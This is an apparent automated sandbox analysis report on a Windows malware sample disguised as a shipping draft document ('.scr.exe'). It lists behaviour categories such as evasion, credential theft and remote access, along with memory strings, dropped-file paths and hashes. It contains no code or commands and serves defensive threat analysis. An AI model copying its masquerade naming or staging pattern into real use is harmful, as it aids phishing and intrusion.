HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4094108405.00000000022F6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1816800517.000000003FAF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868132171.000000003FC60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1806981780.0000000027571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1807026604.000000003FADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1791549862.000000002754C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1809280933.000000003FAF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1825035104.00000000274FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868972825.000000003FC6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4110547668.00000000264F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868972825.000000003FC5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Binary or memory string: OriginalFileName vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.000000000041B000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

ID:	1465946
Product:	CloudBasic
Start time:	10:15:06
Start date:	02.07.2024
Sample:	710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	4ee08be6bfe40c3fb09e904c35299000
SHA1:	9d8e0ebbaaa3598ed03f231267103f24f6c0dd85
SHA256:	e38d2d9b8b63dc2163897bfa2a8401a57483d39d0dace276f360be62cd938852
Filetype:	Win32 Executable (generic) a (10002005/4) 99.81%

Name	Type	MD5	SHA1	SHA256
C:\Users\Public\Glzskrlg.url	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Glzskrlg.PIF">), ASCII text, with CRLF line terminators	66274FD606D225D0F1B5D971F4C5D27D	EDA4B600212C6C301499EABA3B4C7B00D7594EC4	0BCBDDD4334ED59955FEBE414638AB5B700BBDF3F899C18EB377A3B73F71C528
C:\Users\Public\Libraries\Glzskrlg	data	274B42E7AC245D2536160160DE521A55	A26AB7F10CF1DC854ED3661A642BE09EF21C3A4B	4D6B5CDA92A825B3EE9C6342DFD0569A44A6822DA5BAA9494AC5686819AA9021
C:\Users\Public\Libraries\Glzskrlg.PIF	PE32 executable (GUI) Intel 80386, for MS Windows	4EE08BE6BFE40C3FB09E904C35299000	9D8E0EBBAAA3598ED03F231267103F24F6C0DD85	E38D2D9B8B63DC2163897BFA2A8401A57483D39D0DACE276F360BE62CD938852
C:\Users\Public\Libraries\PNO	ASCII text, with CRLF line terminators	8DCE5CBA2FCB46237EDBC27BF53B77C6	96B5332B334477ABA803F6BC68C061AC8384A9DE	29E17B428089C4EBF22DA6A029CA3696AEFEAEDDD52F2CE0322768BAA73D7F66
C:\Users\Public\Libraries\glrkszlG.pif	PE32 executable (GUI) Intel 80386, for MS Windows	C116D3604CEAFE7057D77FF27552C215	452B14432FB5758B46F2897AECCD89F7C82A727D	7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
C:\Users\Public\alpha.exe	PE32+ executable (console) x86-64, for MS Windows	8A2122E8162DBEF04694B9C3E0B6CDEE	F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D	B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
C:\Users\Public\ger.exe	PE32+ executable (console) x86-64, for MS Windows	227F63E1D9008B36BDBCC4B397780BE4	C0DB341DEFA8EF40C03ED769A9001D600E0F4DAE	C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D
C:\Users\Public\xkn.exe	PE32+ executable (console) x86-64, for MS Windows	04029E121A0CFA5991749937DD22A1D9	F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054	9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log	CSV text	A477C52686412872F51E6EADC0EE00E8	97AF03D2CD45488E73DCB72720F6EB704DB687B6	9478FEA68BD400729D6132BC0D47527BE473E45F64C17C4568F655C188EA3C6A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\json[1].json	JSON data	18BC6D34FABB00C1E30D98E8DAEC814A	D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54	862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	1B9939B408D57BA3B6D8F82BB4B3A3C3	63CCC77CB41EF1BD526EFB37D499AB0BB7EB0446	ADB9EEF918193307CF7A4935A6DA1A213F8CF051A09445E8E5F790613770A13C
C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat	ASCII text, with very long lines (324), with CRLF line terminators	E62F427202D3E5A3BA60EBE78567918C	6EF0CD5BA6C871815FCEB27FF095A7931452B334	06BEE225A830EA0E67B91FD7D24280C5315EF82049B25B07C9CFDE4E36A639FF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_inu0x2un.w4d.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncfpuwjd.ueg.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\agyqwjporhwhb	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Local\Temp\bhv5415.tmp	Extensible storage engine DataBase, version 0x620, checksum 0x50f2d234, page size 32768, DirtyShutdown, Windows version 10.0	F98CCC6F50569A3068FB1A2BF43A252A	FE64622BF9047D2FF8A2A566D4388745AA0E7993	1642FCA258B000133587FA6FC6C6B544617284F3D57E3FDC6B882B1918AE0931
C:\Windows \System32\per.exe	PE32+ executable (GUI) x86-64, for MS Windows	85018BE1FD913656BC9FF541F017EACD	26D7407931B713E0F0FA8B872FEECDB3CF49065A	C546E05D705FFDD5E1E18D40E2E7397F186A7C47FA5FC21F234222D057227CF5
\Device\Null	ASCII text, with CRLF line terminators	37283C020F5F3D4DF0BDDC23F6284F08	4B97D1EFA6B90CD54ED7E5676AF1DC5C6F5614A0	9730581531DAFF70288C5BDEB6767F4CAEBDEFB860FF831605777E15E3AB1454

Windows Analysis Report 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Malware Threat Intel
Provided by